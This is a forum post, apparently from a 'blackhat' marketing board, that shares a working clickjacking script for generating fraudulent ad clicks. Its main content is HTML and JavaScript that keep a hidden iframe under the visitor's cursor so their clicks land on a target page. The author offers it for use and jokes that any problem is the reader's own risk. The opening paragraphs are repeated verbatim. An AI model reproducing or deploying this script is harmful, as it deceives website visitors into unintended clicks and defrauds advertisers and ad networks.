i have been around in internet looking for a script to use with ads,clickjacking or something.
in so many places i was asking and nothing,no1 was telling me anything. i even saw some here in blackhat but the most doesnt work. at least not when you upload on web. so i am posting this script here,its working but i dont recomand it with adsense.
just create your own iframe, opacity 0, set the right ids and there wont be any problems. ahahahahahaahahahaahhaaha ok there can be any problem its your own risk.
in so many places i was asking and nothing,no1 was telling me anything. i even saw some here in blackhat but the most doesnt work. at least not when you upload on web. so i am posting this script here,its working but i dont recomand it with adsense.
just create your own iframe, opacity 0, set the right ids and there wont be any problems. ahahahahahaahahahaahhaaha ok there can be any problem its your own risk.
HTML:
<div style="overflow: hidden; width: 160px; height: 152px; position: relative;" id="icontainer"><iframe id="fas" src="any of your targets" style="border: 0pt none ; left: -1187px; top: -833px; position: absolute; width: 1705px; height: 1360px;opacity:1;" scrolling="no"></iframe></div>
<script> document.onmousemove = function (e) {
var x = e.pageX; var y = e.pageY; document.getElementById ('icontainer') .style.top = y-15 + 'px' ; document.getElementById ('icontainer') .style.left = x-40 + 'px' ; } </script>